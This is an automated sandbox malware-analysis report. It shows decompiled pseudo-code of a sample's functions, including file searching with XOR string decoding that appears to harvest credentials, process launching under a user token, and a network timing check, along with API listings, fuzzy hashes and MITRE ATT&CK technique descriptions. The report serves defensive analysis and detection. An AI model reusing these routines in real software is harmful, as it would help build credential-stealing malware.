0x0041cdd4
0x0041cdc4
0x0041cdbe
0x0041cdb0
0x0041cd7b
0x0041cd78
0x0041cd75
0x0041cddd

APIs

PathRenameExtensionW.SHLWAPI(?,.dat,?,00423BC0,00000032,00020016,?,00000000), ref: 0041CDCC

Strings

.dat, xrefs: 0041CDC6
SOFTWARE\Microsoft, xrefs: 0041CD7D

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: ExtensionPathRename
String ID: .dat$SOFTWARE\Microsoft
API String ID: 3337224433-47915998
Opcode ID: ddcccf6899294620907f4346d07ed07497d2a9ff699a423f268a08d251a2e9fa
Instruction ID: c36d6a62a8d22a0f60f39bded60118fe5625406a5a182db7afb2ea94106ddb05
Opcode Fuzzy Hash: ddcccf6899294620907f4346d07ed07497d2a9ff699a423f268a08d251a2e9fa
Instruction Fuzzy Hash: 58019270990209A9CB20DB64ECC1BEA3B79AF00744F504477A909E61C1E73CDEC5C75D

Uniqueness

Uniqueness Score: -1.00%

Function 00417085, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00417085(intOrPtr _a4, intOrPtr _a8) {
				short _v524;
				char _v1044;
				void* __edi;
				void* _t12;
				void* _t20;
				void* _t21;

				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
					L6:
					return 0;
				}
				_t20 = 0;
				while(1) {
					_push(_a4);
					_push(E00413037());
					_push(L"tmp");
					_t19 =  &_v1044;
					_t12 = E004129F1(_t11, 0x104,  &_v1044, L"%s%08x.%s");
					_t21 = _t21 + 0x10;
					if(_t12 == 0xffffffff) {
						goto L6;
					}
					if(E00417593(_t19, _a8,  &_v524) == 0 || E00416EB9(_a8, 0, 0) == 0) {
						_t20 = _t20 + 1;
						if(_t20 < 0x64) {
							continue;
						}
						goto L6;
					} else {
						return 1;
					}
				}
				goto L6;
			}

0x004170a8
0x00417102
0x00000000
0x00417102
0x004170aa
0x004170ac
0x004170ac
0x004170b4
0x004170b5
0x004170c4
0x004170ca
0x004170cf
0x004170d5
0x00000000
0x00000000
0x004170ea
0x004170fc
0x00417100
0x00000000
0x00000000
0x00000000
0x0041710a
0x00000000
0x0041710a
0x004170ea
0x00000000

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 0041709C

Part of subcall function 00413037: GetTickCount.KERNEL32 ref: 00413037

Part of subcall function 00417593: PathCombineW.SHLWAPI(0041C47F,0041C47F,?,0041C47F,?,?), ref: 004175B2

Part of subcall function 00416EB9: CreateFileW.KERNEL32(004137D8,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,004170F8,004137D8,00000000,00000000,004137D8,?), ref: 00416ED3
Part of subcall function 00416EB9: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,004170F8,004137D8,00000000,00000000,004137D8,?), ref: 00416EF6
Part of subcall function 00416EB9: CloseHandle.KERNEL32(00000000,?,004170F8,004137D8,00000000,00000000,004137D8,?), ref: 00416F03

Strings

%s%08x.%s, xrefs: 004170BA
tmp, xrefs: 004170B5

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: FilePath$CloseCombineCountCreateHandleTempTickWrite
String ID: %s%08x.%s$tmp
API String ID: 3395140874-234517578
Opcode ID: f23e5f48b475dc87e705e7e76e6661f1ecd944802fdbe98050d682bef85ec1f6
Instruction ID: ba56c056b3ab216b323b217a0d68cf11ddd0be1ed88c053a947272aad8dffd19
Opcode Fuzzy Hash: f23e5f48b475dc87e705e7e76e6661f1ecd944802fdbe98050d682bef85ec1f6
Instruction Fuzzy Hash: 6A0126B510822476DE203A248C06BEB3B69DB06714F104173BD14B62D2C6798EC6869C

Uniqueness

Uniqueness Score: -1.00%

Function 004158D2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004158D2(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v524;
				void* __esi;
				WCHAR* _t17;
				intOrPtr _t25;
				int _t27;

				_t27 = 0;
				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) != 0 && E00417064( &_v524) != 0) {
					_t17 = PathFindFileNameW( &_v524);
					_t25 = _a4;
					E00411E7D(_a8 + 0xfffffffd | 0xffffffff, _t17, _t25 + 3, 0, _a8 + 0xfffffffd);
					E00411D3A(_t25, "?T", 2);
					 *((char*)(_t25 + 2)) = 0x5c;
					_t27 = 1;
				}
				return _t27;
			}

0x004158e6
0x004158fc
0x00415916
0x0041591c
0x00415930
0x0041593d
0x00415944
0x00415948
0x00415949
0x0041594e

APIs

GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 004158F4

Part of subcall function 00417064: SetFileAttributesW.KERNEL32(00000080,00000080,0040F262,?), ref: 0041706D
Part of subcall function 00417064: DeleteFileW.KERNEL32(?), ref: 00417077

PathFindFileNameW.SHLWAPI(?,?,?), ref: 00415916

Part of subcall function 00411E7D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00412B75,00000000,00000000,00000000,00411EDA,00000000,00000000,00000000,?,00000000), ref: 00411E98

Strings

cab, xrefs: 004158E9

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: File$Name$AttributesByteCharDeleteFindMultiPathTempWide
String ID: cab
API String ID: 2491076439-1787492089
Opcode ID: c5b6635acbb441f33e59878434c902aa51161352cd95977481218ffdccdc8804
Instruction ID: e6e44156d48fe09eac14f3232870562d94a617892b2cfc87fee162dd4a3f5095
Opcode Fuzzy Hash: c5b6635acbb441f33e59878434c902aa51161352cd95977481218ffdccdc8804
Instruction Fuzzy Hash: B401DB7260031477DB209BB9CC4EFCB77ACAF45765F000752B969F32D1D678EA848694

Uniqueness

Uniqueness Score: -1.00%

Function 00410BA8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00410BA8(void* __ecx, void* __esi, void* _a4, void* _a8, void* _a12, intOrPtr _a16) {
				void* _t13;
				void** _t24;
				void* _t27;

				_t13 = _a4(_a8,  &_a8);
				if(_t13 != 0) {
					_t24 = E004153ED(__ecx, _a8);
					if(_t24 != 0) {
						if(EqualSid( *_t24, _a12) != 0) {
							_t27 = _a8;
							if(E00412A6C( &_a4, L"\"%s\"", _a16) > 0) {
								E00413620(_t27, _a4);
								E00411CFE(_a4);
							}
						}
						E00411CFE(_t24);
					}
					return CloseHandle(_a8);
				}
				return _t13;
			}

0x00410bb2
0x00410bb7
0x00410bc2
0x00410bc6
0x00410bd5
0x00410bdb
0x00410bf1
0x00410bf7
0x00410bff
0x00410bff
0x00410c04
0x00410c06
0x00410c06
0x00000000
0x00410c14
0x00410c16

APIs

Part of subcall function 004153ED: GetTokenInformation.ADVAPI32(00000001,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000,00000000,?,?,00413337,00000001,?,?,0041C857,000000FF,00423B70), ref: 00415406
Part of subcall function 004153ED: GetLastError.KERNEL32(?,?,00413337,00000001,?,?,0041C857,000000FF,00423B70), ref: 0041540C
Part of subcall function 004153ED: GetTokenInformation.ADVAPI32(00000001,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,00413337,00000001,?,?,0041C857,000000FF,00423B70), ref: 00415432

EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,00410D02,00000000,?,?,?), ref: 00410BCD

Part of subcall function 00413620: LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 00413631
Part of subcall function 00413620: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00413650
Part of subcall function 00413620: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 0041365C
Part of subcall function 00413620: CreateProcessAsUserW.ADVAPI32(?,00000000,00410BFC,00000000,00000000,00000000,00410BFC,00410BFC,00000000,?,?,?,00000000,00000044), ref: 004136CD
Part of subcall function 00413620: CloseHandle.KERNEL32(?), ref: 004136E0
Part of subcall function 00413620: CloseHandle.KERNEL32(?), ref: 004136E5
Part of subcall function 00413620: FreeLibrary.KERNEL32(?), ref: 004136FC

Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11

CloseHandle.KERNEL32(?,?,00000000,?,00410D02,00000000,?,?,?), ref: 00410C0E

Strings

"%s", xrefs: 00410BE1

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseHandle$AddressFreeInformationLibraryProcToken$CreateEqualErrorHeapLastLoadProcessUser
String ID: "%s"
API String ID: 4035272744-3297466227
Opcode ID: da2505e8c2742bcff41c7b25b41ed0297aa847ee2819b96f6feeca95f0b95a01
Instruction ID: 0a346fc143e5c2869900f78757f688c6474d5c1810565744175642c92e3d2301
Opcode Fuzzy Hash: da2505e8c2742bcff41c7b25b41ed0297aa847ee2819b96f6feeca95f0b95a01
Instruction Fuzzy Hash: 33F06D35100109BBCF126F25DE09DDF3B69EF40764B048126BD19A6121EB79CAE0DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004060D6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

#5.WS2_32(000000FF,00000000,00000000,?,00000000,?), ref: 004060FA
#6.WS2_32(000000FF,00000000,00000000,?,00000000,?), ref: 00406109

Strings

Q@, xrefs: 004060D6

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID: Q@
API String ID: 0-309375607
Opcode ID: 631019465e8f3231f37a71aa623caaf99d50f49320da36f1a312ed35fad218e4
Instruction ID: 640c39d4517a0c9f0a90f03d47a8c546c07363be3143f5d4b8dbbdf586b32435
Opcode Fuzzy Hash: 631019465e8f3231f37a71aa623caaf99d50f49320da36f1a312ed35fad218e4
Instruction Fuzzy Hash: 2F01713490024DAADF00CFA4C8057EE7BB4AF05314F108566E862EA2D2D7788665DB66

Uniqueness

Uniqueness Score: -1.00%

Function 00413DC7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413DC7(intOrPtr __eax, void* __eflags) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				void* __edi;
				intOrPtr _t26;

				_t26 = 0;
				_v56 = 0x101;
				_v52 = 0;
				_v48 = __eax;
				_v44 = E00413D46();
				_v40 = "http://www.google.com/webhp";
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0x80000;
				_v12 = 0;
				_v8 = GetTickCount();
				if(E00413C14( &_v56, 0) != 0) {
					_t26 = GetTickCount() - _v8;
				}
				E00411CFE(_v44);
				return _t26;
			}

0x00413dcf
0x00413dd2
0x00413dd8
0x00413ddb
0x00413de9
0x00413dec
0x00413df3
0x00413df6
0x00413df9
0x00413dfc
0x00413dff
0x00413e02
0x00413e09
0x00413e12
0x00413e1c
0x00413e22
0x00413e22
0x00413e28
0x00413e33

APIs

Part of subcall function 00413D46: LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 00413D57
Part of subcall function 00413D46: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00413D6A
Part of subcall function 00413D46: FreeLibrary.KERNEL32(?), ref: 00413DBC

GetTickCount.KERNEL32 ref: 00413E0C

Part of subcall function 00413C14: WaitForSingleObject.KERNEL32(?,?,?,?,00000000), ref: 00413C68
Part of subcall function 00413C14: InternetCloseHandle.WININET(00000000), ref: 00413D01

GetTickCount.KERNEL32 ref: 00413E1E

Strings

http://www.google.com/webhp, xrefs: 00413DEC

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CountLibraryTick$AddressCloseFreeHandleInternetLoadObjectProcSingleWait
String ID: http://www.google.com/webhp
API String ID: 2673491915-2670330958
Opcode ID: 9102aac889070dd24ea69f547a37dc436b0b34a0208c881b29bd790a92d1c276
Instruction ID: 84bcec6437fa73027f0863274e80e3971655fee6e0fd5640792127c9b38d10da
Opcode Fuzzy Hash: 9102aac889070dd24ea69f547a37dc436b0b34a0208c881b29bd790a92d1c276
Instruction Fuzzy Hash: E001E8B1D11228AACF00DFE9DA444DEFBB8AF08B58F10415BE900B7210D3B55A448FE8

Uniqueness

Uniqueness Score: -1.00%

Function 00415DBE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00415DBE(signed char* __esi, long _a4, _Unknown_base(*)()* _a8, char _a12) {
				void* _t9;

				if( *__esi < 0x40) {
					if(_a8 == 0) {
						L6:
						return 1;
					}
					_t2 =  &_a12; // 0x423a58
					_t9 = CreateThread(0, _a4, _a8,  *_t2, 0, 0);
					if(_t9 == 0) {
						L2:
						return 0;
					}
					__esi[4 + ( *__esi & 0x000000ff) * 4] = _t9;
					 *__esi =  *__esi + 1;
					goto L6;
				}
				SetLastError(0x9b);
				goto L2;
			}

0x00415dc1
0x00415dd7
0x00415dfe
0x00000000
0x00415dfe
0x00415ddd
0x00415deb
0x00415df3
0x00415dce
0x00000000
0x00415dce
0x00415df8
0x00415dfc
0x00000000
0x00415dfc
0x00415dc8
0x00000000

APIs

SetLastError.KERNEL32(0000009B,0041CFF0,00000000,00419A3E,00000000,00423A58,00000000,00000104,0001FDA6,00000000), ref: 00415DC8
CreateThread.KERNEL32(00000000,?,?,X:B,00000000,00000000), ref: 00415DEB

Strings

X:B, xrefs: 00415DDD

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateErrorLastThread
String ID: X:B
API String ID: 1689873465-546658527
Opcode ID: 7c6d79594da102cece9c9963c67b19b8565d8224896a466253401fd2a2e4d9e5
Instruction ID: db39b7b21a88e2968c2a2deffe1d87c192f2c9c6fd4ef0f36bd3416321cd9369
Opcode Fuzzy Hash: 7c6d79594da102cece9c9963c67b19b8565d8224896a466253401fd2a2e4d9e5
Instruction Fuzzy Hash: 45E0D170108341FAD7254F20AE0CB96BFD1AF4DB01F54885DF3C1251E1C3794454D72A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A469, Relevance: 5.2, APIs: 4, Instructions: 197
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040A469(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				char _v524;
				char _v576;
				char _v580;
				char _v588;
				intOrPtr _v608;
				char _v612;
				char _v620;
				char _v628;
				char _v632;
				char* _v640;
				signed int _v644;
				char* _v648;
				char** _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				char* _v664;
				char* _v668;
				char* _v672;
				char* _v676;
				void* __edi;
				void* __esi;
				signed int _t82;
				char* _t83;
				intOrPtr _t85;
				char** _t101;
				char* _t112;
				char* _t121;
				char* _t122;
				void* _t123;
				char* _t126;
				char* _t127;
				char* _t156;
				void* _t157;
				signed int _t166;
				char* _t167;
				char** _t168;
				intOrPtr _t170;
				char* _t171;
				signed int _t172;
				void* _t174;

				_t174 = (_t172 & 0xfffffff8) - 0x294;
				if(E00417593( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L31:
					return 1;
				}
				_t177 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_push( &_v524);
					_t82 = 2;
					_t83 = E00416F1E(_t82,  &_v524,  &_v612);
					__eflags = _t83;
					if(_t83 == 0) {
						goto L31;
					}
					_t85 = E00412599(_v608,  &_v652, _v612, 1, 0);
					_v660 = _t85;
					__eflags = _t85 - 0xffffffff;
					if(_t85 == 0xffffffff) {
						L30:
						E00416FC6( &_v612);
						goto L31;
					}
					_v640 = E00411CCE(0x622);
					E00419861(0x91,  &_v588);
					E00419861(0x92,  &_v628);
					E00419861(0x93,  &_v620);
					E00419861(0x94,  &_v576);
					__eflags = _v640;
					if(_v640 == 0) {
						L29:
						E00411CFE(_v640);
						E00411D1A(_v652, _v656);
						goto L30;
					}
					_v644 = 0;
					__eflags = _v648;
					if(_v648 > 0) {
						do {
							_t166 = _v644;
							_t101 = _v652;
							__eflags =  *(_t101 + _t166 * 4);
							if( *(_t101 + _t166 * 4) == 0) {
								goto L28;
							}
							_v664 = StrStrIA( *(_t101 + _t166 * 4),  &_v588);
							_t156 = StrStrIA( *(_v656 + _t166 * 4),  &_v632);
							_v668 = StrStrIA( *(_v660 + _t166 * 4),  &_v628);
							_t112 = StrStrIA( *(_v664 + _t166 * 4),  &_v588);
							__eflags = _v676;
							_t167 = _t112;
							if(_v676 == 0) {
								goto L28;
							}
							__eflags = _v672;
							if(_v672 == 0) {
								goto L28;
							}
							__eflags = _t167;
							if(_t167 == 0) {
								goto L28;
							}
							_v676 =  &(_v676[8]);
							_v672 =  &(_v672[6]);
							_t168 =  &(_t167[0xa]);
							_v652 = _t168;
							E0040A44F();
							E0040A44F();
							E0040A44F();
							__eflags = _t156;
							if(_t156 == 0) {
								L15:
								_t157 = 0x15;
								L16:
								__eflags =  *_v676;
								if( *_v676 == 0) {
									goto L28;
								}
								__eflags =  *_v672;
								if( *_v672 == 0) {
									goto L28;
								}
								_t121 =  *_t168;
								__eflags = _t121;
								if(_t121 == 0) {
									goto L28;
								}
								__eflags = _t121 - 0x30;
								if(_t121 == 0x30) {
									L21:
									__eflags = _t168[0];
									if(_t168[0] == 0) {
										goto L28;
									}
									L22:
									_t122 = 0;
									__eflags =  *_t168;
									if( *_t168 == 0) {
										goto L28;
									} else {
										goto L23;
									}
									do {
										L23:
										_t122[_t168] = _t122[_t168] ^ 0x00000019;
										_t122 =  &(_t122[1]);
										__eflags = _t122[_t168];
									} while (_t122[_t168] != 0);
									__eflags = _t122;
									if(_t122 > 0) {
										_t169 =  &_v580;
										_t123 = 0x57;
										E00419897(_t123,  &_v580);
										_push(_t157);
										_push(_v676);
										_t158 = _v656;
										_push(_v652);
										_push(_v672);
										_t126 = E004129F1(_t169, 0x311, _v656, _t169);
										_t174 = _t174 + 0x14;
										__eflags = _t126;
										if(_t126 > 0) {
											_t170 = _a4;
											_t127 = E004120F2(_t126, _t170, _t158);
											__eflags = _t127;
											if(_t127 != 0) {
												_t68 = _t170 + 4;
												 *_t68 =  &(( *(_t170 + 4))[1]);
												__eflags =  *_t68;
											}
										}
									}
									goto L28;
								}
								__eflags = _t121 - 0x31;
								if(_t121 != 0x31) {
									goto L22;
								}
								goto L21;
							}
							_v648 =  &(_t156[6]);
							E0040A44F();
							_t157 = E0041237D(_v648,  &_v588, 0);
							__eflags = _t157 - 1;
							if(_t157 < 1) {
								goto L15;
							}
							__eflags = _t157 - 0xffff;
							if(_t157 <= 0xffff) {
								goto L16;
							}
							goto L15;
							L28:
							_v644 = _v644 + 1;
							__eflags = _v644 - _v648;
						} while (_v644 < _v648);
					}
					goto L29;
				} else {
					_t171 =  &_v612;
					E00419897(0x90, _t171);
					_v648 = _t171;
					E00417437( &_v524,  &_v648, _t177, 1, 5, E0040A469, _a4, 0, 0, 0);
					goto L31;
				}
			}

0x0040a46f
0x0040a48d
0x0040a6ed
0x0040a6f5
0x0040a6f5
0x0040a493
0x0040a496
0x0040a4d9
0x0040a4dc
0x0040a4e1
0x0040a4e6
0x0040a4e8
0x00000000
0x00000000
0x0040a4ff
0x0040a504
0x0040a508
0x0040a50b
0x0040a6e4
0x0040a6e8
0x00000000
0x0040a6e8
0x0040a51b
0x0040a528
0x0040a536
0x0040a544
0x0040a552
0x0040a557
0x0040a55b
0x0040a6ce
0x0040a6d2
0x0040a6df
0x00000000
0x0040a6df
0x0040a561
0x0040a565
0x0040a569
0x0040a575
0x0040a575
0x0040a579
0x0040a57d
0x0040a581
0x00000000
0x00000000
0x0040a591
0x0040a5a3
0x0040a5b3
0x0040a5c3
0x0040a5c5
0x0040a5ca
0x0040a5cc
0x00000000
0x00000000
0x0040a5d2
0x0040a5d7
0x00000000
0x00000000
0x0040a5dd
0x0040a5df
0x00000000
0x00000000
0x0040a5e5
0x0040a5ee
0x0040a5f3
0x0040a5f6
0x0040a5fa
0x0040a603
0x0040a60a
0x0040a60f
0x0040a611
0x0040a63b
0x0040a63d
0x0040a63e
0x0040a642
0x0040a645
0x00000000
0x00000000
0x0040a64b
0x0040a64e
0x00000000
0x00000000
0x0040a650
0x0040a652
0x0040a654
0x00000000
0x00000000
0x0040a656
0x0040a658
0x0040a65e
0x0040a65e
0x0040a662
0x00000000
0x00000000
0x0040a664
0x0040a664
0x0040a666
0x0040a668
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a66a
0x0040a66a
0x0040a66a
0x0040a66e
0x0040a66f
0x0040a66f
0x0040a675
0x0040a677
0x0040a67b
0x0040a67f
0x0040a680
0x0040a685
0x0040a686
0x0040a68a
0x0040a68e
0x0040a694
0x0040a69e
0x0040a6a3
0x0040a6a6
0x0040a6a8
0x0040a6aa
0x0040a6b0
0x0040a6b5
0x0040a6b7
0x0040a6b9
0x0040a6b9
0x0040a6b9
0x0040a6b9
0x0040a6b7
0x0040a6a8
0x00000000
0x0040a677
0x0040a65a
0x0040a65c
0x00000000
0x00000000
0x00000000
0x0040a65c
0x0040a618
0x0040a61c
0x0040a62c
0x0040a62e
0x0040a631
0x00000000
0x00000000
0x0040a633
0x0040a639
0x00000000
0x00000000
0x00000000
0x0040a6bc
0x0040a6bc
0x0040a6c4
0x0040a6c4
0x0040a575
0x00000000
0x0040a498
0x0040a498
0x0040a4a1
0x0040a4a8
0x0040a4c8
0x00000000
0x0040a4c8

APIs

Part of subcall function 00417593: PathCombineW.SHLWAPI(0041C47F,0041C47F,?,0041C47F,?,?), ref: 004175B2

StrStrIA.SHLWAPI(?,?,?,00000001,00000000,?,?), ref: 0040A58F
StrStrIA.SHLWAPI(?,?), ref: 0040A5A1
StrStrIA.SHLWAPI(?,?), ref: 0040A5B1
StrStrIA.SHLWAPI(?,?), ref: 0040A5C3

Part of subcall function 00417437: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00417476
Part of subcall function 00417437: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0041749D
Part of subcall function 00417437: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 004174E7
Part of subcall function 00417437: Sleep.KERNEL32(00000000,?,?), ref: 00417544
Part of subcall function 00417437: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00417572
Part of subcall function 00417437: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00417584

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Find$FilePath$CloseCombineFirstMatchNextObjectSingleSleepSpecWait
String ID:
API String ID: 1075381090-0
Opcode ID: 47313cf1560ff0782bcf5b64348806938f904317ca05cdd3bd17954cb4a6c3d5
Instruction ID: e0213c739e6100ddcb9ccccd5f5583ceeffb721738dec9559267d106f42ee4a5
Opcode Fuzzy Hash: 47313cf1560ff0782bcf5b64348806938f904317ca05cdd3bd17954cb4a6c3d5
Instruction Fuzzy Hash: 2F718A715083409FD721EF25C805A9FBBE5AB88704F040D2EF4C4A72A2D779DD9A8B4B

Uniqueness

Uniqueness Score: -1.00%

Function 00410179, Relevance: 5.1, APIs: 4, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410179(intOrPtr _a4) {
				intOrPtr _v8;
				void* __esi;
				void* _t13;
				signed int _t19;
				signed short _t26;
				signed int _t30;
				void* _t37;

				_t37 = E0041284D(_a4);
				if(_t37 > 0x3e8) {
					EnterCriticalSection(0x422b14);
					E00411CFE( *0x422b08);
					 *0x422b08 =  *0x422b08 & 0x00000000;
					 *0x422b10 = 0;
					LeaveCriticalSection(0x422b14);
					return 0;
				}
				EnterCriticalSection(0x422b14);
				_t26 = ( *0x422b10 & 0x0000ffff) + _t37;
				if(_t26 <= 0x3e8) {
					_t13 = E00411C89(_t26 + _t26, 0x422b08);
					if(_t13 != 0) {
						_t30 =  *0x422b08; // 0x0
						_t13 = E00411D3A(_t30 + ( *0x422b10 & 0x0000ffff) * 2, _a4, _t37 + _t37);
						 *0x422b10 = _t26;
					}
				} else {
					_t13 = E00411C89(0x7d0, 0x422b08);
					if(_t13 != 0) {
						_t18 = 0x3e8 - _t37;
						_t19 =  *0x422b08; // 0x0
						E00411D3A(_t19, _t19 + (( *0x422b10 & 0x0000ffff) - 0x3e8 - _t37) * 2, 0x3e8 - _t37 + _t18);
						_t13 = E00411D3A(0x3e8 - _t37 + _t18 +  *0x422b08, _v8, _t37 + _t37);
						 *0x422b10 = 0x3e8;
					}
				}
				LeaveCriticalSection(0x422b14);
				return _t13;
			}

0x00410185
0x0041018e
0x00410196
0x004101a2
0x004101a7
0x004101b1
0x004101b7
0x00000000
0x004101b7
0x004101c8
0x004101d5
0x004101de
0x0041022e
0x00410235
0x00410237
0x00410250
0x00410255
0x00410255
0x004101e0
0x004101e5
0x004101ec
0x004101f7
0x004101fe
0x00410209
0x0041021d
0x00410222
0x00410222
0x004101ec
0x00410261
0x00000000

APIs

EnterCriticalSection.KERNEL32(00422B14,?,?,?,0041046C,?), ref: 00410196

Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11

LeaveCriticalSection.KERNEL32(00422B14,?,?,?,0041046C,?), ref: 004101B7
EnterCriticalSection.KERNEL32(00422B14,?,?,?,?,0041046C,?), ref: 004101C8
LeaveCriticalSection.KERNEL32(00422B14,?,?,?,0041046C,?), ref: 00410261

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$FreeHeap
String ID:
API String ID: 1946732658-0
Opcode ID: ebaba5a99235a608a2430792e46bfce08d6605d8dc6620ea8d5f0ede7bdac62f
Instruction ID: 432901c8a39dedcc9bc86719a24562a25592633b0c44dc6362db4010ae1a70de
Opcode Fuzzy Hash: ebaba5a99235a608a2430792e46bfce08d6605d8dc6620ea8d5f0ede7bdac62f
Instruction Fuzzy Hash: 1C21A475700115ABCB15DF94EE94DB93B68AB84308740092BF501A7171EBB86986C7AD

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	AWS CloudTrail logs, Authentication logs, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

